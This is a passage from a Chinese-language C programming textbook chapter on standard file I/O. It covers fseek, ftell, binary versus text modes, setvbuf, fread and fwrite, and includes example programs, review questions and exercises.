接下来,我们要讨论3个问题:fseek()和ftell()函数的工作原理、如何使 用二进制流、如何让程序可移植。 13.5.1 fseek()和ftell()的工作原理 fseek()的第1个参数是FILE指针,指向待查找的文件,fopen()应该已打 开该文件。 fseek()的第2个参数是偏移量(offset)。该参数表示从起始点开始要移 动的距离(参见表13.3列出的起始点模式)。该参数必须是一个long类型的 值,可以为正(前移)、负(后移)或0(保持不动)。 fseek()的第3个参数是模式,该参数确定起始点。根据ANSI标准,在 stdio.h头文件中规定了几个表示模式的明示常量(manifest constant),如表 13.3所示。 表13.3 文件的起始点模式 972 旧的实现可能缺少这些定义,可以使用数值0L、1L、2L分别表示这3种 模式。L后缀表明其值是long类型。或者,实现可能把这些明示常量定义在 别的头文件中。如果不确定,请查阅实现的使用手册或在线帮助。 下面是调用fseek()函数的一些示例,fp是一个文件指针: fseek(fp, 0L, SEEK_SET); // 定位至文件开始处 fseek(fp, 10L, SEEK_SET); // 定位至文件中的第10个字节 fseek(fp, 2L, SEEK_CUR); // 从文件当前位置前移2个字节 fseek(fp, 0L, SEEK_END); // 定位至文件结尾 fseek(fp, -10L, SEEK_END); // 从文件结尾处回退10个字节 对于这些调用还有一些限制,我们稍后再讨论。 如果一切正常,fseek()的返回值为0;如果出现错误(如试图移动的距 离超出文件的范围),其返回值为-1。 ftell()函数的返回类型是long,它返回的是当前的位置。ANSI C把它定 义在stdio.h中。在最初实现的UNIX中,ftell()通过返回距文件开始处的字节 数来确定文件的位置。文件的第1个字节到文件开始处的距离是0,以此类 推。ANSI C规定,该定义适用于以二进制模式打开的文件,以文件模式打 开文件的情况不同。这也是程序清单13.4以二进制模式打开文件的原因。 下面,我们来分析程序清单13.4中的基本要素。首先,下面的语句: fseek(fp, 0L, SEEK_END); 973 把当前位置设置为距文件末尾 0 字节偏移量。也就是说,该语句把当前 位置设置在文件结尾。下一条语句: last = ftell(fp); 把从文件开始处到文件结尾的字节数赋给last。 然后是一个for循环: for (count = 1L; count <= last; count++) { fseek(fp, -count, SEEK_END); /* go backward */ ch = getc(fp); } 第1轮迭代,把程序定位到文件结尾的第1个字符(即,文件的最后一个 字符)。然后,程序打印该字符。下一轮迭代把程序定位到前一个字符,并 打印该字符。重复这一过程直至到达文件的第1个字符,并打印。 13.5.2 二进制模式和文本模式 我们设计的程序清单13.4在UNIX和MS-DOS环境下都可以运行。UNIX 只有一种文件格式,所以不需要进行特殊的转换。然而MS-DOS要格外注 意。许多MS-DOS编辑器都用Ctrl+Z标记文本文件的结尾。以文本模式打开 这样的文件时,C 能识别这个作为文件结尾标记的字符。但是,以二进制模 
式打开相同的文件时,Ctrl+Z字符被看作是文件中的一个字符,而实际的文 件结尾符在该字符的后面。文件结尾符可能紧跟在Ctrl+Z字符后面,或者文 件中可能用空字符填充,使该文件的大小是256的倍数。在DOS环境下不会 打印空字符,程序清单13.4中就包含了防止打印Ctrl+Z字符的代码。 二进制模式和文本模式的另一个不同之处是:MS-DOS用\r\n组合表示文 974 本文件换行。以文本模式打开相同的文件时,C程序把\r\n“看成”\n。但是, 以二进制模式打开该文件时,程序能看见这两个字符。因此,程序清单13.4 中还包含了不打印\r的代码。通常,UNIX文本文件既没有Ctrl+Z,也没有 \r,所以这部分代码不会影响大部分UNIX文本文件。 ftell()函数在文本模式和二进制模式中的工作方式不同。许多系统的文 本文件格式与UNIX的模型有很大不同,导致从文件开始处统计的字节数成 为一个毫无意义的值。ANSI C规定,对于文本模式,ftell()返回的值可以作 为fseek()的第2个参数。对于MS-DOS,ftell()返回的值把\r\n当作一个字节计 数。 13.5.3 可移植性 理论上,fseek()和ftell()应该符合UNIX模型。但是,不同系统存在着差 异,有时确实无法做到与UNIX模型一致。因此,ANSI对这些函数降低了要 求。下面是一些限制。 在二进制模式中,实现不必支持SEEK_END模式。因此无法保证程序清 单13.4的可移植性。移植性更高的方法是逐字节读取整个文件直到文件末 尾。C 预处理器的条件编译指令(第 16 章介绍)提供了一种系统方法来处 理这种情况。 在文本模式中,只有以下调用能保证其相应的行为。 不过,许多常见的环境都支持更多的行为。 13.5.4 fgetpos()和fsetpos()函数 975 fseek()和 ftell()潜在的问题是,它们都把文件大小限制在 long 类型能表 示的范围内。也许 20亿字节看起来相当大,但是随着存储设备的容量迅猛 增长,文件也越来越大。鉴于此,ANSI C新增了两个处理较大文件的新定 位函数:fgetpos()和 fsetpos()。这两个函数不使用 long 类型的值表示位置, 它们使用一种新类型:fpos_t(代表file position type,文件定位类型)。 fpos_t类型不是基本类型,它根据其他类型来定义。fpos_t 类型的变量或数 据对象可以在文件中指定一个位置,它不能是数组类型,除此之外,没有其 他限制。实现可以提供一个满足特殊平台要求的类型,例如,fpos_t可以实 现为结构。 ANSI C定义了如何使用fpos_t类型。fgetpos()函数的原型如下: int fgetpos(FILE * restrict stream, fpos_t * restrict pos); 调用该函数时,它把fpos_t类型的值放在pos指向的位置上,该值描述了 文件中的一个位置。如果成功,fgetpos()函数返回0;如果失败,返回非0。 fsetpos()函数的原型如下: int fsetpos(FILE *stream, const fpos_t *pos); 调用该函数时,使用pos指向位置上的fpos_t类型值来设置文件指针指向 该值指定的位置。如果成功,fsetpos()函数返回0;如果失败,则返回非0。 fpos_t类型的值应通过之前调用fgetpos()获得。 976 13.6 标准I/O的机理 我们在前面学习了标准I/O包的特性,本节研究一个典型的概念模型, 分析标准I/O的工作原理。 通常,使用标准I/O的第1步是调用fopen()打开文件(前面介绍过,C程 序会自动打开3种标准文件)。fopen()函数不仅打开一个文件,还创建了一 个缓冲区(在读写模式下会创建两个缓冲区)以及一个包含文件和缓冲区数 据的结构。另外,fopen()返回一个指向该结构的指针,以便其他函数知道如 何找到该结构。假设把该指针赋给一个指针变量fp,我们说fopen()函数“打 开一个流”。如果以文本模式打开该文件,就获得一个文本流;如果以二进 制模式打开该文件,就获得一个二进制流。 这个结构通常包含一个指定流中当前位置的文件位置指示器。除此之 外,它还包含错误和文件结尾的指示器、一个指向缓冲区开始处的指针、一 个文件标识符和一个计数(统计实际拷贝进缓冲区的字节数)。 我们主要考虑文件输入。通常,使用标准I/O的第2步是调用一个定义在 stdio.h中的输入函数,如fscanf()、getc()或 fgets()。一调用这些函数,文件中 的数据块就被拷贝到缓冲区中。缓冲区的大小因实现而异,一般是512字节 或是它的倍数,如4096或16384(随着计算机硬盘容量越来越大,缓冲区的 大小也越来越大)。最初调用函数,除了填充缓冲区外,还要设置fp所指向 的结构中的值。尤其要设置流中的当前位置和拷贝进缓冲区的字节数。通 常,当前位置从字节0开始。 在初始化结构和缓冲区后,输入函数按要求从缓冲区中读取数据。在它 读取数据时,文件位置指示器被设置为指向刚读取字符的下一个字符。由于 stdio.h系列的所有输入函数都使用相同的缓冲区,所以调用任何一个函数都 将从上一次函数停止调用的位置开始。 当输入函数发现已读完缓冲区中的所有字符时,会请求把下一个缓冲大 小的数据块从文件拷贝到该缓冲区中。以这种方式,输入函数可以读取文件 977 中的所有内容,直到文件结尾。函数在读取缓冲区中的最后一个字符后,把 结尾指示器设置为真。于是,下一次被调用的输入函数将返回EOF。 输出函数以类似的方式把数据写入缓冲区。当缓冲区被填满时,数据将 被拷贝至文件中。 978 13.7 其他标准I/O函数 ANSI标准库的标准I/O系列有几十个函数。虽然在这里无法一一列举, 但是我们会简要地介绍一些,让读者对它们有一个大概的了解。这里列出函 数的原型,表明函数的参数和返回类型。我们要讨论的这些函数,除了 setvbuf(),其他函数均可在ANSI之前的实现中使用。参考资料V的“新增C99 和C11的标准ANSI C库”中列出了全部的ANSI C标准I/O包。 13.7.1 int ungetc(int c, FILE *fp)函数 int ungetc()函数把c指定的字符放回输入流中。如果把一个字符放回输入 流,下次调用标准输入函数时将读取该字符(见图13.2)。例如,假设要读 取下一个冒号之前的所有字符,但是不包括冒号本身,可以使用 getchar()或 getc()函数读取字符到冒号,然后使用 ungetc()函数把冒号放回输入流中。 ANSI C标准保证每次只会放回一个字符。如果实现允许把一行中的多个字 符放回输入流,那么下一次输入函数读入的字符顺序与放回时的顺序相反。 图13.2 ungets()函数 13.7.2 int fflush()函数 979 fflush()函数的原型如下: int fflush(FILE *fp); 调用fflush()函数引起输出缓冲区中所有的未写入数据被发送到fp指定的 输出文件。这个过程称为刷新缓冲区。如果 fp是空指针,所有输出缓冲区 都被刷新。在输入流中使用fflush()函数的效果是未定义的。只要最近一次操 作不是输入操作,就可以用该函数来更新流(任何读写模式)。 13.7.3 int setvbuf()函数 setvbuf()函数的原型是: int setvbuf(FILE * restrict fp, char * restrict buf, int mode, size_t size); setvbuf()函数创建了一个供标准I/O函数替换使用的缓冲区。在打开文件 后且未对流进行其他操作之前,调用该函数。指针fp识别待处理的流,buf 指向待使用的存储区。如果buf的值不是NULL,则必须创建一个缓冲区。例 如,声明一个内含1024个字符的数组,并传递该数组的地址。然而,如果把 NULL作为buf的值,该函数会为自己分配一个缓冲区。变量size告诉setvbuf() 数组的大小(size_t是一种派生的整数类型,第5章介绍过)。mode的选择如 下:_IOFBF表示完全缓冲(在缓冲区满时刷新);_IOLBF表示行缓冲(在 缓冲区满时或写入一个换行符时);_IONBF表示无缓冲。如果操作成功, 函数返回0,否则返回一个非零值。 
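下面的片段粗略演示了 setvbuf() 的典型用法（文件名 data.bin 和 4096 这个缓冲区大小只是示意，并非固定写法；片段假定出现在某个函数内部，且已包含 stdio.h）：

FILE * fp;
static char mybuf[4096];            /* 缓冲区在流关闭前必须一直有效 */

if ((fp = fopen("data.bin", "rb")) != NULL)
{
    if (setvbuf(fp, mybuf, _IOFBF, sizeof mybuf) != 0)
        fputs("Can't set up buffer\n", stderr);
    /* ……随后再对 fp 进行读取操作…… */
}

这里把缓冲区声明为 static，是为了确保它在流的整个使用期间都存在；如上文所述，也可以把第2个参数设为 NULL，让函数自行分配缓冲区。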
假设一个程序要储存一种数据对象,每个数据对象的大小是3000字节。 可以使用setvbuf()函数创建一个缓冲区,其大小是该数据对象大小的倍数。 13.7.4 二进制I/O:fread()和fwrite() 介绍fread()和fwrite()函数之前,先要了解一些背景知识。之前用到的标 准I/O函数都是面向文本的,用于处理字符和字符串。如何要在文件中保存 数值数据?用 fprintf()函数和%f转换说明只是把数值保存为字符串。例如, 下面的代码: 980 double num = 1./3.; fprintf(fp,"%f", num); 把num储存为8个字符:0.333333。使用%.2f转换说明将其储存为4个字 符:0.33,用%.12f转换说明则将其储存为 14 个字符:0.333333333333。改 变转换说明将改变储存该值所需的空间数量,也会导致储存不同的值。把 num 储存为 0.33 后,读取文件时就无法将其恢复为更高的精度。一般而 言, fprintf()把数值转换为字符数据,这种转换可能会改变值。 为保证数值在储存前后一致,最精确的做法是使用与计算机相同的位组 合来储存。因此,double 类型的值应该储存在一个 double 大小的单元中。 如果以程序所用的表示法把数据储存在文件中,则称以二进制形式储存数 据。不存在从数值形式到字符串的转换过程。对于标准 I/O,fread()和 fwrite 函数用于以二进制形式处理数据(见图13.3)。 实际上,所有的数据都是以二进制形式储存的,甚至连字符都以字符码 的二进制表示来储存。如果文件中的所有数据都被解释成字符码,则称该文 件包含文本数据。如果部分或所有的数据都被解释成二进制形式的数值数 据,则称该文件包含二进制数据(另外,用数据表示机器语言指令的文件都 是二进制文件)。 981 图13.3 二进制输出和文本输出 二进制和文本的用法很容易混淆。ANSI C和许多操作系统都识别两种 文件格式:二进制和文本。能以二进制数据或文本数据形式存储或读取信 982 息。可以用二进制模式打开文本格式的文件,可以把文本储存在二进制形式 的文件中。可以调用 getc()拷贝包含二进制数据的文件。然而,一般而言, 用二进制模式在二进制格式文件中储存二进制数据。类似地,最常用的还是 以文本格式打开文本文件中的文本数据(通常文字处理器生成的文件都是二 进制文件,因为这些文件中包含了大量非文本信息,如字体和格式等)。 13.7.5 size_t fwrite()函数 fwrite()函数的原型如下: size_t fwrite(const void * restrict ptr, size_t size, size_t nmemb,FILE * restrict fp); fwrite()函数把二进制数据写入文件。size_t是根据标准C类型定义的类 型,它是sizeof运算符返回的类型,通常是unsigned int,但是实现可以选择 使用其他类型。指针ptr是待写入数据块的地址。size表示待写入数据块的大 小(以字节为单位),nmemb表示待写入数据块的数量。和其他函数一样, fp指定待写入的文件。例如,要保存一个大小为256字节的数据对象(如数 组),可以这样做: char buffer[256]; fwrite(buffer, 256, 1, fp); 以上调用把一块256字节的数据从buffer写入文件。另举一例,要保存一 个内含10个double类型值的数组,可以这样做: double earnings[10]; fwrite(earnings, sizeof(double), 10, fp); 以上调用把earnings数组中的数据写入文件,数据被分成10块,每块都 是double的大小。 983 注意fwrite()原型中的const void * restrict ptr声明。fwrite()的一个问题 是,它的第1个参数不是固定的类型。例如,第1个例子中使用buffer,其类 型是指向char的指针;而第2个例子中使用earnings,其类型是指向double的 指针。在ANSI C函数原型中,这些实际参数都被转换成指向void的指针类 型,这种指针可作为一种通用类型指针(在ANSI C之前,这些参数使用char *类型,需要把实参强制转换成char *类型)。 fwrite()函数返回成功写入项的数量。正常情况下,该返回值就是 nmemb,但如果出现写入错误,返回值会比nmemb小。 13.7.6 size_t fread()函数 size_t fread()函数的原型如下: size_t fread(void * restrict ptr, size_t size, size_t nmemb,FILE * restrict fp); fread()函数接受的参数和fwrite()函数相同。在fread()函数中,ptr是待读 取文件数据在内存中的地址,fp指定待读取的文件。该函数用于读取被 fwrite()写入文件的数据。例如,要恢复上例中保存的内含10个double类型值 的数组,可以这样做: double earnings[10]; fread(earnings, sizeof (double), 10, fp); 该调用把10个double大小的值拷贝进earnings数组中。 fread()函数返回成功读取项的数量。正常情况下,该返回值就是 nmemb,但如果出现读取错误或读到文件结尾,该返回值就会比nmemb小。 13.7.7 int feof(FILE *fp)和int ferror(FILE *fp)函数 如果标准输入函数返回 EOF,则通常表明函数已到达文件结尾。然 而,出现读取错误时,函数也会返回EOF。feof()和ferror()函数用于区分这 984 两种情况。当上一次输入调用检测到文件结尾时,feof()函数返回一个非零 值,否则返回0。当读或写出现错误,ferror()函数返回一个非零值,否则返 回0。 13.7.8 一个程序示例 接下来,我们用一个程序示例说明这些函数的用法。该程序把一系列文 件中的内容附加在另一个文件的末尾。该程序存在一个问题:如何给文件传 递信息。可以通过交互或使用命令行参数来完成,我们先采用交互式的方 法。下面列出了程序的设计方案。 询问目标文件的名称并打开它。 使用一个循环询问源文件。 以读模式依次打开每个源文件,并将其添加到目标文件的末尾。 为演示setvbuf()函数的用法,该程序将使用它指定一个不同的缓冲区大 小。下一步是细化程序打开目标文件的步骤: 1.以附加模式打开目标文件; 2.如果打开失败,则退出程序; 3.为该文件创建一个4096字节的缓冲区; 4.如果创建失败,则退出程序。 与此类似,通过以下具体步骤细化拷贝部分: 1.如果该文件与目标文件相同,则跳至下一个文件; 2.如果以读模式无法打开文件,则跳至下一个文件; 3.把文件内容添加至目标文件末尾。 985 最后,程序回到目标文件的开始处,显示当前整个文件的内容。 作为练习,我们使用fread()和fwrite()函数进行拷贝。程序清单13.5给出 了这个程序。 程序清单13.5 append.c程序 /* append.c -- 把文件附加到另一个文件末尾 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define BUFSIZE 4096 #define SLEN 81 void append(FILE *source, FILE *dest); char * s_gets(char * st, int n); int main(void) { FILE *fa, *fs;  // fa 指向目标文件,fs 指向源文件 int files = 0;     // 附加的文件数量 char file_app[SLEN];  // 目标文件名 char file_src[SLEN];  // 源文件名 int ch; 986 puts("Enter name of destination file:"); s_gets(file_app, SLEN); if ((fa = fopen(file_app, "a+")) == NULL) { fprintf(stderr, "Can't open 
%s\n", file_app); exit(EXIT_FAILURE); } if (setvbuf(fa, NULL, _IOFBF, BUFSIZE) != 0) { fputs("Can't create output buffer\n", stderr); exit(EXIT_FAILURE); } puts("Enter name of first source file (empty line to quit):"); while (s_gets(file_src, SLEN) && file_src[0] != '\0') { if (strcmp(file_src, file_app) == 0) fputs("Can't append file to itself\n", stderr); else if ((fs = fopen(file_src, "r")) == NULL) fprintf(stderr, "Can't open %s\n", file_src); 987 else { if (setvbuf(fs, NULL, _IOFBF, BUFSIZE) != 0) { fputs("Can't create input buffer\n", stderr); continue; } append(fs, fa); if (ferror(fs) != 0) fprintf(stderr, "Error in reading file %s.\n", file_src); if (ferror(fa) != 0) fprintf(stderr, "Error in writing file %s.\n", file_app); fclose(fs); files++; printf("File %s appended.\n", file_src); puts("Next file (empty line to quit):"); } 988 } printf("Done appending.%d files appended.\n", files); rewind(fa); printf("%s contents:\n", file_app); while ((ch = getc(fa)) != EOF) putchar(ch); puts("Done displaying."); fclose(fa); return 0; } void append(FILE *source, FILE *dest) { size_t bytes; static char temp[BUFSIZE]; // 只分配一次 while ((bytes = fread(temp, sizeof(char), BUFSIZE, source)) > 0) fwrite(temp, sizeof(char), bytes, dest); } char * s_gets(char * st, int n) { 989 char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue; } return ret_val; } 如果setvbuf()无法创建缓冲区,则返回一个非零值,然后终止程序。可 以用类似的代码为正在拷贝的文件创建一块4096字节的缓冲区。把NULL作 为setvbuf()的第2个参数,便可让函数分配缓冲区的存储空间。 该程序获取文件名所用的函数是 s_gets(),而不是 scanf(),因为 scanf() 会跳过空白,因此无法检测到空行。该程序还用s_gets()代替fgets(),因为后 者在字符串中保留换行符。 990 以下代码防止程序把文件附加在自身末尾: if (strcmp(file_src, file_app) == 0) fputs("Can't append file to itself\n",stderr); 参数file_app表示目标文件名,file_src表示正在处理的文件名。 append()函数完成拷贝任务。该函数使用fread()和fwrite()一次拷贝4096 字节,而不是一次拷贝1字节: void append(FILE *source, FILE *dest) { size_t bytes; static char temp[BUFSIZE]; // 只分配一次 while ((bytes = fread(temp, sizeof(char), BUFSIZE, source)) > 0) fwrite(temp, sizeof(char), bytes, dest); } 因为是以附加模式打开由 dest 指定的文件,所以所有的源文件都被依 次添加至目标文件的末尾。注意,temp数组具有静态存储期(意思是在编译 时分配该数组,不是在每次调用append()函数时分配)和块作用域(意思是 该数组属于它所在的函数私有)。 该程序示例使用文本模式的文件。使用"ab+"和"rb"模式可以处理二进制 文件。 13.7.9 用二进制I/O进行随机访问 随机访问是用二进制I/O写入二进制文件最常用的方式,我们来看一个 991 简短的例子。程序清单13.6中的程序创建了一个储存double类型数字的文 件,然后让用户访问这些内容。 程序清单13.6 randbin.c程序 /* randbin.c -- 用二进制I/O进行随机访问 */ #include <stdio.h> #include <stdlib.h> #define ARSIZE 1000 int main() { double numbers[ARSIZE]; double value; const char * file = "numbers.dat"; int i; long pos; FILE *iofile; // 创建一组 double类型的值 for (i = 0; i < ARSIZE; i++) numbers[i] = 100.0 * i + 1.0 / (i + 1); // 尝试打开文件 992 if ((iofile = fopen(file, "wb")) == NULL) { fprintf(stderr, "Could not open %s for output.\n", file); exit(EXIT_FAILURE); } // 以二进制格式把数组写入文件 fwrite(numbers, sizeof(double), ARSIZE, iofile); fclose(iofile); if ((iofile = fopen(file, "rb")) == NULL) { fprintf(stderr, "Could not open %s for random access.\n", file); exit(EXIT_FAILURE); } // 从文件中读取选定的内容 printf("Enter an index in the range 0-%d.\n", ARSIZE - 1); while (scanf("%d", &i) == 1 && i >= 0 && i < ARSIZE) { pos = (long) i * sizeof(double);  // 计算偏移量 993 fseek(iofile, pos, SEEK_SET);    // 定位到此处 fread(&value, sizeof(double), 1, iofile); printf("The value there is %f.\n", value); printf("Next index (out of range to quit):\n"); } // 完成 fclose(iofile); puts("Bye!"); return 0; } 首先,该程序创建了一个数组,并在该数组中存放了一些值。然后,程 
序以二进制模式创建了一个名为numbers.dat的文件,并使用fwrite()把数组中 的内容拷贝到文件中。内存中数组的所有double类型值的位组合(每个位组 合都是64位)都被拷贝至文件中。不能用文本编辑器读取最后的二进制文 件,因为无法把文件中的值转换成字符串。然而,储存在文件中的每个值都 与储存在内存中的值完全相同,没有损失任何精确度。此外,每个值在文件 中也同样占用64位存储空间,所以可以很容易地计算出每个值的位置。 程序的第 2 部分用于打开待读取的文件,提示用户输入一个值的索引。 程序通过把索引值和 double类型值占用的字节相乘,即可得出文件中的一个 位置。然后,程序调用fseek()定位到该位置,用fread()读取该位置上的数据 值。注意,这里并未使用转换说明。fread()从已定位的位置开始,拷贝8字 节到内存中地址为&value的位置。然后,使用printf()显示value。下面是该程 序的一个运行示例: 994 Enter an index in the range 0-999. 500 The value there is 50000.001996. Next index (out of range to quit): 900 The value there is 90000.001110. Next index (out of range to quit): 0 The value there is 1.000000. Next index (out of range to quit): -1 Bye! 995 13.8 关键概念 C程序把输入看作是字节流,输入流来源于文件、输入设备(如键 盘),或者甚至是另一个程序的输出。类似地,C程序把输出也看作是字节 流,输出流的目的地可以是文件、视频显示等。 C 如何解释输入流或输出流取决于所使用的输入/输出函数。程序可以 不做任何改动地读取和存储字节,或者把字节依次解释成字符,随后可以把 这些字符解释成普通文本以用文本表示数字。类似地,对于输出,所使用的 函数决定了二进制值是被原样转移,还是被转换成文本或以文本表示数字。 如果要在不损失精度的前提下保存或恢复数值数据,请使用二进制模式以及 fread()和fwrite()函数。如果打算保存文本信息并创建能在普通文本编辑器查 看的文本,请使用文本模式和函数(如getc()和fprintf())。 要访问文件,必须创建文件指针(类型是FILE *)并把指针与特定文件 名相关联。随后的代码就可以使用这个指针(而不是文件名)来处理该文 件。 要重点理解C如何处理文件结尾。通常,用于读取文件的程序使用一个 循环读取输入,直至到达文件结尾。C 输入函数在读过文件结尾后才会检测 到文件结尾,这意味着应该在尝试读取之后立即判断是否是文件结尾。可以 使用13.2.4节中“设计范例”中的双文件输入模式。 996 13.9 本章小结 对于大多数C程序而言,写入文件和读取文件必不可少。为此,绝大对 数C实现都提供底层I/O和标准高级I/O。因为ANSI C库考虑到可移植性,包 含了标准I/O包,但是未提供底层I/O。 标准 I/O 包自动创建输入和输出缓冲区以加快数据传输。fopen()函数为 标准 I/O 打开一个文件,并创建一个用于存储文件和缓冲区信息的结构。 fopen()函数返回指向该结构的指针,其他函数可以使用该指针指定待处理的 文件。feof()和ferror()函数报告I/O操作失败的原因。 C把输入视为字节流。如果使用fread()函数,C把输入看作是二进制值 并将其储存在指定存储位置。如果使用fscanf()、getc()、fgets()或其他相关函 数,C则将每个字节看作是字符码。然后fscanf()和scanf()函数尝试把字符码 翻译成转换说明指定的其他类型。例如,输入一个值23,%f转换说明会把 23翻译成一个浮点值,%d转换说明会把23翻译成一个整数值,%s转换说明 则会把23储存为字符串。getc()和 fgetc()系列函数把输入作为字符码储存, 将其作为单独的字符保存在字符变量中或作为字符串储存在字符数组中。类 似地,fwrite()将二进制数据直接放入输出流,而其他输出函数把非字符数 据转换成用字符表示后才将其放入输出流。 ANSI C提供两种文件打开模式:二进制和文本。以二进制模式打开文 件时,可以逐字节读取文件;以文本模式打开文件时,会把文件内容从文本 的系统表示法映射为C表示法。对于UNIX和Linux系统,这两种模式完全相 同。 通常,输入函数getc()、fgets()、fscanf()和fread()都从文件开始处按顺序 读取文件。然而, fseek()和ftell()函数让程序可以随机访问文件中的任意位 置。fgetpos()和fsetpos()把类似的功能扩展至更大的文件。与文本模式相 比,二进制模式更容易进行随机访问。 997 13.10 复习题 复习题的参考答案在附录A中。 1.下面的程序有什么问题? int main(void) { int * fp; int k; fp = fopen("gelatin"); for (k = 0; k < 30; k++) fputs(fp, "Nanette eats gelatin."); fclose("gelatin"); return 0; } 2.下面的程序完成什么任务?(假设在命令行环境中运行) #include <stdio.h> #include <stdlib.h> #include <ctype.h> int main(int argc, char *argv []) { 998 int ch; FILE *fp; if (argc < 2) exit(EXIT_FAILURE); if ((fp = fopen(argv[1], "r")) == NULL) exit(EXIT_FAILURE); while ((ch = getc(fp)) != EOF) if (isdigit(ch)) putchar(ch); fclose(fp); return 0; } 3.假设程序中有下列语句: #include <stdio.h> FILE * fp1,* fp2; char ch; fp1 = fopen("terky", "r"); fp2 = fopen("jerky", "w"); 另外,假设成功打开了两个文件。补全下面函数调用中缺少的参数: 999 a.ch = getc(); b.fprintf( ,"%c\n", ); c.putc( , ); d.fclose(); /* 关闭terky文件 */ 4.编写一个程序,不接受任何命令行参数或接受一个命令行参数。如果 有一个参数,将其解释为文件名;如果没有参数,使用标准输入(stdin)作 为输入。假设输入完全是浮点数。该程序要计算和报告输入数字的算术平均 值。 5.编写一个程序,接受两个命令行参数。第1个参数是字符,第2个参数 是文件名。要求该程序只打印文件中包含给定字符的那些行。 注意 C程序根据'\n'识别文件中的行。假设所有行都不超过256个字符,你可 能会想到用fgets()。 6.二进制文件和文本文件有何区别?二进制流和文本流有何区别? 7. a.分别用fprintf()和fwrite()储存8238201有何区别? b.分别用putc()和fwrite()储存字符S有何区别? 8.下面语句的区别是什么? printf("Hello, %s\n", name); fprintf(stdout, "Hello, %s\n", name); fprintf(stderr, "Hello, %s\n", name); 1000 9."a+"、"r+"和"w+"模式打开的文件都是可读写的。哪种模式更适合用 来更改文件中已有的内容? 
1001 13.11 编程练习 1.修改程序清单13.1中的程序,要求提示用户输入文件名,并读取用户 输入的信息,不使用命令行参数。 2.编写一个文件拷贝程序,该程序通过命令行获取原始文件名和拷贝文 件名。尽量使用标准I/O和二进制模式。 3.编写一个文件拷贝程序,提示用户输入文本文件名,并以该文件名作 为原始文件名和输出文件名。该程序要使用 ctype.h 中的 toupper()函数,在 写入到输出文件时把所有文本转换成大写。使用标准I/O和文本模式。 4.编写一个程序,按顺序在屏幕上显示命令行中列出的所有文件。使用 argc控制循环。 5.修改程序清单13.5中的程序,用命令行界面代替交互式界面。 6.使用命令行参数的程序依赖于用户的内存如何正确地使用它们。重写 程序清单 13.2 中的程序,不使用命令行参数,而是提示用户输入所需信 息。 7.编写一个程序打开两个文件。可以使用命令行参数或提示用户输入文 件名。 a.该程序以这样的顺序打印:打印第1个文件的第1行,第2个文件的第1 行,第1个文件的第2行,第2个文件的第2行,以此类推,打印到行数较多文 件的最后一行。 b.修改该程序,把行号相同的行打印成一行。 8.编写一个程序,以一个字符和任意文件名作为命令行参数。如果字符 后面没有参数,该程序读取标准输入;否则,程序依次打开每个文件并报告 每个文件中该字符出现的次数。文件名和字符本身也要一同报告。程序应包 含错误检查,以确定参数数量是否正确和是否能打开文件。如果无法打开文 1002 件,程序应报告这一情况,然后继续处理下一个文件。 9.修改程序清单 13.3 中的程序,从 1 开始,根据加入列表的顺序为每个 单词编号。当程序下次运行时,确保新的单词编号接着上次的编号开始。 10.编写一个程序打开一个文本文件,通过交互方式获得文件名。通过 一个循环,提示用户输入一个文件位置。然后该程序打印从该位置开始到下 一个换行符之前的内容。用户输入负数或非数值字符可以结束输入循环。 11.编写一个程序,接受两个命令行参数。第1个参数是一个字符串,第 2个参数是一个文件名。然后该程序查找该文件,打印文件中包含该字符串 的所有行。因为该任务是面向行而不是面向字符的,所以要使用fgets()而不 是getc()。使用标准C库函数strstr()(11.5.7节简要介绍过)在每一行中查找 指定字符串。假设文件中的所有行都不超过255个字符。 12.创建一个文本文件,内含20行,每行30个整数。这些整数都在0~9 之间,用空格分开。该文件是用数字表示一张图片,0~9表示逐渐增加的灰 度。编写一个程序,把文件中的内容读入一个20×30的int数组中。一种把这 些数字转换为图片的粗略方法是:该程序使用数组中的值初始化一个20×31 的字符数组,用值0 对应空格字符,1 对应点字符,以此类推。数字越大表 示字符所占的空间越大。例如,用#表示9。每行的最后一个字符(第31个) 是空字符,这样该数组包含了20个字符串。最后,程序显示最终的图片 (即,打印所有的字符串),并将结果储存在文本文件中。例如,下面是开 始的数据: 0 0 9 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 5 8 9 9 8 5 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 1 9 8 5 4 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 5 8 9 9 8 5 0 4 5 2 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 4 5 2 0 0 0 0 0 0 0 1003 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 1 8 5 0 0 0 4 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 4 5 2 0 0 0 0 0 5 5 5 5 5 5 5 5 5 5 5 5 5 8 9 9 8 5 5 5 5 5 5 5 5 5 5 5 5 5 8 8 8 8 8 8 8 8 8 8 8 8 5 8 9 9 8 5 8 8 8 8 8 8 8 8 8 8 8 8 9 9 9 9 0 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 3 9 9 9 9 9 9 9 8 8 8 8 8 8 8 8 8 8 8 8 5 8 9 9 8 5 8 8 8 8 8 8 8 8 8 8 8 8 5 5 5 5 5 5 5 5 5 5 5 5 5 8 9 9 8 5 5 5 5 5 5 5 5 5 5 5 5 5 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 6 6 0 0 0 0 0 0 0 0 0 0 2 2 0 0 0 0 0 0 5 8 9 9 8 5 0 0 5 6 0 0 6 5 0 0 0 0 0 0 0 0 3 3 0 0 0 0 0 0 5 8 9 9 8 5 0 5 6 1 1 1 1 6 5 0 0 0 0 0 0 0 4 4 0 0 0 0 0 0 5 8 9 9 8 5 0 0 5 6 0 0 6 5 0 0 0 0 0 0 0 0 5 5 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 6 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 